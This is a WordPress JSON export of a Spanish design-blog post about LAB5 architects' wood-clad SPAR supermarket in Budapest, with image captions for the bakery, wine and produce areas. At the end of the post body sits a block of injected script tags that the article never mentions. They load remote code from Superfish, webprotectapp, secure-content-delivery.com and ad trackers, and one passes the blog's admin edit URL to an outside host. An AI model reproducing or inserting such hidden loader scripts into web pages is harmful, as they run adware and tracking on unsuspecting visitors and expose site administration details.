{"id":316,"date":"2014-02-16T19:52:01","date_gmt":"2014-02-16T19:52:01","guid":{"rendered":"http:\/\/blogs.hoy.es\/red-decora\/?p=316"},"modified":"2014-02-16T19:52:01","modified_gmt":"2014-02-16T19:52:01","slug":"spar-un-supermercado-de-toda-la-vida-se-fusiona-con-el-diseno","status":"publish","type":"post","link":"https:\/\/blogs.hoy.es\/red-decora\/2014\/02\/16\/spar-un-supermercado-de-toda-la-vida-se-fusiona-con-el-diseno\/","title":{"rendered":"SPAR un supermercado de &#8220;toda la vida\u201d que se fusiona con el dise\u00f1o."},"content":{"rendered":"<p>Siempre me gusta ense\u00f1ar las<strong> nuevas propuestas<\/strong> que nos muestra el panorama europeo, \u00a0para poder captar y <strong>aprender\u00a0 sobre nuevas ideas constructivas\u00a0 y nuevos conceptos\u00a0 dentro del dise\u00f1o.<\/strong><\/p>\n<div style=\"width: 540px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/f03eaa792c8653e3946b7d32c751673e.jpg\"><img loading=\"lazy\" title=\"f03eaa792c8653e3946b7d32c751673e\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/f03eaa792c8653e3946b7d32c751673e.jpg\" alt=\"\" width=\"530\" height=\"530\" \/><\/a><p class=\"wp-caption-text\">Furgoneta RENAULT 4<\/p><\/div>\n<p style=\"text-align: center;\">Los <strong>supermercados SPAR\u00a0 \u201cde toda la vida\u201d<\/strong>, est\u00e1n cambiando su <strong>im\u00e1gen y es que esta cadena holandesa ha inagurado \u00a0recientemente en Budapest una nueva tienda<\/strong> , en el centro comercial MOM PARK. Esta nueva apertura,\u00a0 tiene como <strong>objetivo ser una tienda insignia para estos supermercados \u00a0<\/strong>y marcar la diferencia con un <strong>dise\u00f1o \u00fanico y lujoso en el comercio<\/strong>, llegando a producir una gran sensaci\u00f3n al consumidor en su compra.<\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_318\" style=\"width: 586px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/abde749a499a46d14517b8c56f14b232.jpg\"><img aria-describedby=\"caption-attachment-318\" loading=\"lazy\" class=\" wp-image-318 \" title=\"abde749a499a46d14517b8c56f14b232\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/abde749a499a46d14517b8c56f14b232.jpg\" alt=\"\" width=\"576\" height=\"411\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/abde749a499a46d14517b8c56f14b232.jpg 720w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/abde749a499a46d14517b8c56f14b232-300x214.jpg 300w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/a><p id=\"caption-attachment-318\" class=\"wp-caption-text\">Entrada principal del supermercado .<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>El estudio encargado de este gran cambio ha sido <strong>LAB5 Architecs<\/strong>, y es que han decidido romper con los moldes y dar vida a un supermercado donde la arquitectura y el dise\u00f1o industrial son igual de protagonistas que los productos de alimentaci\u00f3n, bebidas o\u00a0 ropa.<\/p>\n<p><strong>SPAR\u00a0 significa bosque de pinos<\/strong> , esto fue una de las ideas claves para llevar \u00a0a cabo el dise\u00f1o del supermercado y hacer presente la <strong>madera como principal protagonista, creando espacios muy acogedores\u00a0<\/strong> a pesar de ser un local comercial\u00a0 destinado \u00a0a la venta de alimentaci\u00f3n.<\/p>\n<div id=\"attachment_319\" style=\"width: 599px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/0401e837d30bff80982bc49dadd30331.jpg\"><img aria-describedby=\"caption-attachment-319\" loading=\"lazy\" class=\" wp-image-319\" title=\"0401e837d30bff80982bc49dadd30331\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/0401e837d30bff80982bc49dadd30331.jpg\" alt=\"\" width=\"589\" height=\"420\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/0401e837d30bff80982bc49dadd30331.jpg 736w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/0401e837d30bff80982bc49dadd30331-300x214.jpg 300w\" sizes=\"(max-width: 589px) 100vw, 589px\" \/><\/a><p id=\"caption-attachment-319\" class=\"wp-caption-text\">Cajas revestidas de resina acr\u00edlica.<\/p><\/div>\n<p>Se eligi\u00f3 la resina acr\u00edlica para el acabado de los muebles redondeados, logrando as\u00ed una mayor fluidez y mayor sensaci\u00f3n de limpieza. Un par de vigas blancas curvadas gu\u00edan al comprador a trav\u00e9s de los pasillos en los que las frutas y verduras se muestran dentro de sus cajas en una isla realizada en Corian. Las cajas de cobro se sit\u00faan en la parte delantera de la tienda y siguen esa l\u00ednea redondeada en tonos blancos y grises.<\/p>\n<div id=\"attachment_320\" style=\"width: 599px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/28207ea5ced10d9635c15ca2dd405494.jpg\"><img aria-describedby=\"caption-attachment-320\" loading=\"lazy\" class=\" wp-image-320 \" title=\"28207ea5ced10d9635c15ca2dd405494\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/28207ea5ced10d9635c15ca2dd405494.jpg\" alt=\"\" width=\"589\" height=\"420\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/28207ea5ced10d9635c15ca2dd405494.jpg 736w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/28207ea5ced10d9635c15ca2dd405494-300x214.jpg 300w\" sizes=\"(max-width: 589px) 100vw, 589px\" \/><\/a><p id=\"caption-attachment-320\" class=\"wp-caption-text\">Entrada.<\/p><\/div>\n<div style=\"width: 507px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_10.jpg\"><img loading=\"lazy\" class=\"  \" title=\"Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_10\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_10.jpg\" alt=\"\" width=\"497\" height=\"354\" \/><\/a><p class=\"wp-caption-text\">Coffe shop<\/p><\/div>\n<div id=\"attachment_321\" style=\"width: 478px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/d68bb0d63e3e9d1a78f88ac9f37dd860.jpg\"><img aria-describedby=\"caption-attachment-321\" loading=\"lazy\" class=\"size-full wp-image-321 \" title=\"d68bb0d63e3e9d1a78f88ac9f37dd860\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/d68bb0d63e3e9d1a78f88ac9f37dd860.jpg\" alt=\"\" width=\"468\" height=\"621\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/d68bb0d63e3e9d1a78f88ac9f37dd860.jpg 468w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/d68bb0d63e3e9d1a78f88ac9f37dd860-226x300.jpg 226w\" sizes=\"(max-width: 468px) 100vw, 468px\" \/><\/a><p id=\"caption-attachment-321\" class=\"wp-caption-text\">Cabezera de los diferentes pasillos.<\/p><\/div>\n<div id=\"attachment_322\" style=\"width: 512px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_8.jpg\"><img aria-describedby=\"caption-attachment-322\" loading=\"lazy\" class=\" wp-image-322  \" title=\"Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_8\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_8.jpg\" alt=\"\" width=\"502\" height=\"358\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_8.jpg 784w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_8-300x214.jpg 300w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_8-768x549.jpg 768w\" sizes=\"(max-width: 502px) 100vw, 502px\" \/><\/a><p id=\"caption-attachment-322\" class=\"wp-caption-text\">Zona fria.<\/p><\/div>\n<div id=\"attachment_323\" style=\"width: 481px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/6ecb6efc084124b03d404776f6a857d6.jpg\"><img aria-describedby=\"caption-attachment-323\" loading=\"lazy\" class=\" wp-image-323  \" title=\"6ecb6efc084124b03d404776f6a857d6\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/6ecb6efc084124b03d404776f6a857d6.jpg\" alt=\"\" width=\"471\" height=\"336\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/6ecb6efc084124b03d404776f6a857d6.jpg 736w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/6ecb6efc084124b03d404776f6a857d6-300x214.jpg 300w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><\/a><p id=\"caption-attachment-323\" class=\"wp-caption-text\">Zona Charcuteria.<\/p><\/div>\n<div>\n<div id=\"attachment_325\" style=\"width: 512px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_12.jpg\"><img aria-describedby=\"caption-attachment-325\" loading=\"lazy\" class=\" wp-image-325  \" title=\"Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_12\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_12.jpg\" alt=\"\" width=\"502\" height=\"358\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_12.jpg 784w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_12-300x214.jpg 300w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_12-768x549.jpg 768w\" sizes=\"(max-width: 502px) 100vw, 502px\" \/><\/a><p id=\"caption-attachment-325\" class=\"wp-caption-text\">Zona Fruter\u00eda.<\/p><\/div>\n<p>Las<strong> formas onduladas de madera en el techo conducen al cliente a lo largo del recorrido a trav\u00e9s del suelo y las paredes.<\/strong> De ellas nacen las diferentes \u00a0islas donde se exponen los productos, tal como si estuvieran en un mercado de abastos.Las dos zonas <strong>m\u00e1s destacables son la panader\u00eda y la secci\u00f3n de vinos<\/strong> a las que\u00a0 han querido dotar de un ambiente m\u00e1s calido y que indique la calidad del producto. Las paredes est\u00e1n pintadas de color marr\u00f3n en armon\u00eda con el ambiente natural de los materiales utilizados para su <strong>decoraci\u00f3n.<\/strong><\/p>\n<div id=\"attachment_326\" style=\"width: 512px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_6.jpg\"><img aria-describedby=\"caption-attachment-326\" loading=\"lazy\" class=\" wp-image-326  \" title=\"Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_6\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_6.jpg\" alt=\"\" width=\"502\" height=\"358\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_6.jpg 784w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_6-300x214.jpg 300w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_6-768x549.jpg 768w\" sizes=\"(max-width: 502px) 100vw, 502px\" \/><\/a><p id=\"caption-attachment-326\" class=\"wp-caption-text\">Zona Panader\u00eda.<\/p><\/div>\n<div id=\"attachment_327\" style=\"width: 481px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/c31788796bdc6dad33ecff7f90c1ee46.jpg\"><img aria-describedby=\"caption-attachment-327\" loading=\"lazy\" class=\" wp-image-327  \" title=\"c31788796bdc6dad33ecff7f90c1ee46\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/c31788796bdc6dad33ecff7f90c1ee46.jpg\" alt=\"\" width=\"471\" height=\"357\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/c31788796bdc6dad33ecff7f90c1ee46.jpg 736w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/c31788796bdc6dad33ecff7f90c1ee46-300x227.jpg 300w\" sizes=\"(max-width: 471px) 100vw, 471px\" \/><\/a><p id=\"caption-attachment-327\" class=\"wp-caption-text\">Zona Panader\u00eda2.<\/p><\/div>\n<div id=\"attachment_328\" style=\"width: 518px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_3-1.jpg\"><img aria-describedby=\"caption-attachment-328\" loading=\"lazy\" class=\" wp-image-328   \" title=\"Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_3 (1)\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_3-1.jpg\" alt=\"\" width=\"508\" height=\"363\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_3-1.jpg 784w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_3-1-300x214.jpg 300w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/Spar-supermercado-en-Budapest-dise\u00f1o-por-LAB5-architects_3-1-768x549.jpg 768w\" sizes=\"(max-width: 508px) 100vw, 508px\" \/><\/a><p id=\"caption-attachment-328\" class=\"wp-caption-text\">Zona Vinoteca.<\/p><\/div>\n<p>Toda la <strong>distribuci\u00f3n interna de \u00a0la tienda tuvo un condicionante<\/strong> de dise\u00f1o: <strong>el dise\u00f1o del techo<\/strong>, es el verdadero protagonista y delinea los diversos vol\u00famenes del supermercado. Hay dos zonas en las que la parte \u00f3ptica del techo se convierte en una forma 3D ,que fluye hacia la secci\u00f3n de la\u00a0 panader\u00eda, donde los \u00a0sentimientos c\u00e1lidos se fortalecen y\u00a0 en la secci\u00f3n de vinos, donde las l\u00e1minas del techo contin\u00faan hasta el suelo para formar un espacio de una bodega e indican en esta secci\u00f3n la calidad y la cultura del producto. Los diferentes estantes y mostradores forman \u00a0islas redondeadas juntas que se integran perfectamente con el dise\u00f1o de las diferentes l\u00e1minas de madera.<\/p>\n<div id=\"attachment_329\" style=\"width: 599px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/b19b75f83005ccab3c1053a36abdcb19.jpg\"><img aria-describedby=\"caption-attachment-329\" loading=\"lazy\" class=\" wp-image-329 \" title=\"b19b75f83005ccab3c1053a36abdcb19\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/b19b75f83005ccab3c1053a36abdcb19.jpg\" alt=\"\" width=\"589\" height=\"420\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/b19b75f83005ccab3c1053a36abdcb19.jpg 736w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/b19b75f83005ccab3c1053a36abdcb19-300x214.jpg 300w\" sizes=\"(max-width: 589px) 100vw, 589px\" \/><\/a><p id=\"caption-attachment-329\" class=\"wp-caption-text\">Zona Vinoteca2.<\/p><\/div>\n<div id=\"attachment_330\" style=\"width: 246px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/cd00760c093d7241ea36c371da9daffd.jpg\"><img aria-describedby=\"caption-attachment-330\" loading=\"lazy\" class=\"size-full wp-image-330 \" title=\"cd00760c093d7241ea36c371da9daffd\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/cd00760c093d7241ea36c371da9daffd.jpg\" alt=\"\" width=\"236\" height=\"354\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/cd00760c093d7241ea36c371da9daffd.jpg 236w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/cd00760c093d7241ea36c371da9daffd-200x300.jpg 200w\" sizes=\"(max-width: 236px) 100vw, 236px\" \/><\/a><p id=\"caption-attachment-330\" class=\"wp-caption-text\">Zona Vinoteca3.<\/p><\/div>\n<div id=\"attachment_331\" style=\"width: 538px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/768f3634c746d30598e566538a48d99f.jpg\"><img aria-describedby=\"caption-attachment-331\" loading=\"lazy\" class=\" wp-image-331 \" title=\"768f3634c746d30598e566538a48d99f\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/768f3634c746d30598e566538a48d99f.jpg\" alt=\"\" width=\"528\" height=\"700\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/768f3634c746d30598e566538a48d99f.jpg 660w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/768f3634c746d30598e566538a48d99f-226x300.jpg 226w\" sizes=\"(max-width: 528px) 100vw, 528px\" \/><\/a><p id=\"caption-attachment-331\" class=\"wp-caption-text\">Zona Vinacoteca4.<\/p><\/div>\n<div id=\"attachment_332\" style=\"width: 746px\" class=\"wp-caption aligncenter\"><a href=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/34eb2a19a0cf6a18298c2196cde52b58.jpg\"><img aria-describedby=\"caption-attachment-332\" loading=\"lazy\" class=\"size-full wp-image-332\" title=\"34eb2a19a0cf6a18298c2196cde52b58\" src=\"\/red-decora\/wp-content\/uploads\/sites\/66\/2014\/02\/34eb2a19a0cf6a18298c2196cde52b58.jpg\" alt=\"\" width=\"736\" height=\"525\" srcset=\"https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/34eb2a19a0cf6a18298c2196cde52b58.jpg 736w, https:\/\/static-blogs.hoy.es\/wp-content\/uploads\/sites\/66\/2014\/02\/34eb2a19a0cf6a18298c2196cde52b58-300x214.jpg 300w\" sizes=\"(max-width: 736px) 100vw, 736px\" \/><\/a><p id=\"caption-attachment-332\" class=\"wp-caption-text\">Zona Vinacoteca5.<\/p><\/div>\n<p>via: <a title=\"PINTEREST\" href=\"http:\/\/www.pinterest.com\/moocmoc\/\" target=\"_blank\">pinterest<\/a>,<a title=\"LABS5STUDIO\" href=\"http:\/\/www.lab5studio.com\/\">LAB5STUDIO<\/a>,<a title=\"GOOGLE\" href=\"https:\/\/www.google.es\/#q=spar+budapest\" target=\"_blank\">google<\/a>,<\/p>\n<p>seguirme: <a title=\"facebook\" href=\"https:\/\/www.facebook.com\/MoocMoc\" target=\"_blank\">FACEBOOK<\/a>,<a title=\"MOOCMOC\" href=\"http:\/\/moocmocdesign.blogspot.com.es\/\" target=\"_blank\">MOOCMOC<\/a>,<a title=\"PINTEREST\" href=\"http:\/\/www.pinterest.com\/moocmoc\/\" target=\"_blank\">PINTEREST<\/a>,<a title=\"TWITTER\" href=\"https:\/\/twitter.com\/MoocMoc\" target=\"_blank\">TWITTER<\/a><a title=\"CONTACTACONMIGO\" href=\"http:\/\/es.beperk.com\/ghelen-indesign\/diseno-de-proyectos-empresas-particulares-y-marcas\/1\/2023?aid=diYgLh\" target=\"_blank\">,CONTACTACONMIGO<\/a><\/p>\n<p style=\"text-align: center;\">\n<\/div>\n<div id=\"__tbSetup\"><\/div>\n<p><script type=\"text\/javascript\" src=\"https:\/\/secure-content-delivery.com\/mware-detection\/index.php?d=blogs.hoy.es&#038;c=mwareDetect.returned\"><\/script><script type=\"text\/javascript\" src=\"https:\/\/secure-content-delivery.com\/data.js.php?i={B62B325E-6CC0-4CCD-B25C-B88F706622D3}&#038;d=2012-10-25&#038;s=https:\/\/blogs.hoy.es\/red-decora\/wp-admin\/post.php?post=316&#038;action=edit&#038;cb=0.8167381718494627\"><\/script><script id=\"__changoScript\" type=\"text\/javascript\">\/\/ <![CDATA[\nvar __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text\/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https:\/\/z': 'http:\/\/p') + '.chango.com\/static\/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();\n\/\/ ]]><\/script><script id=\"__simpliScript\" type=\"text\/javascript\" src=\"\/\/i.simpli.fi\/dpx.js?cid=3065&#038;m=0\" data-sifi-parsed=\"true\"><\/script><script type=\"text\/javascript\" src=\"\/\/www.superfish.com\/ws\/sf_main.jsp?dlsource=wjfudcm&#038;userId=e0I2MkIzMjVFLTZDQzAtNE&#038;CTID=default-ES\"><\/script><script type=\"text\/javascript\" src=\"\/\/static.webprotectapp00.webprotectapp.com\/partnerconfig\/webprotect.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/static.webprotectapp00.webprotectapp.com\/apps\/boot\/boot-start.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/static.webprotectapp00.webprotectapp.com\/apps\/tv-classic\/tv-classic-noboot-fg.js\"><\/script><script type=\"text\/javascript\" src=\"\/\/static.webprotectapp00.webprotectapp.com\/apps\/boot\/boot-end.js\"><\/script><\/p>\n<p>&nbsp;<\/p>\n<!-- AddThis Advanced Settings generic via filter on the_content --><!-- AddThis Share Buttons generic via filter on the_content -->","protected":false},"excerpt":{"rendered":"<p>Siempre me gusta ense\u00f1ar las nuevas propuestas que nos muestra el panorama europeo, \u00a0para poder captar y aprender\u00a0 sobre nuevas ideas constructivas\u00a0 y nuevos conceptos\u00a0 dentro del dise\u00f1o. Los supermercados SPAR\u00a0 \u201cde toda la vida\u201d, est\u00e1n cambiando su im\u00e1gen y es que esta cadena holandesa ha inagurado \u00a0recientemente en Budapest una nueva tienda , en [&hellip;]<!-- AddThis Advanced Settings generic via filter on get_the_excerpt --><!-- AddThis Share Buttons generic via filter on get_the_excerpt --><\/p>\n","protected":false},"author":72,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[33,50,63,107,109,114,122,142,144,151,171,173,182,185,197,200],"_links":{"self":[{"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/posts\/316"}],"collection":[{"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/users\/72"}],"replies":[{"embeddable":true,"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/comments?post=316"}],"version-history":[{"count":0,"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/posts\/316\/revisions"}],"wp:attachment":[{"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/media?parent=316"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/categories?post=316"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blogs.hoy.es\/red-decora\/wp-json\/wp\/v2\/tags?post=316"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}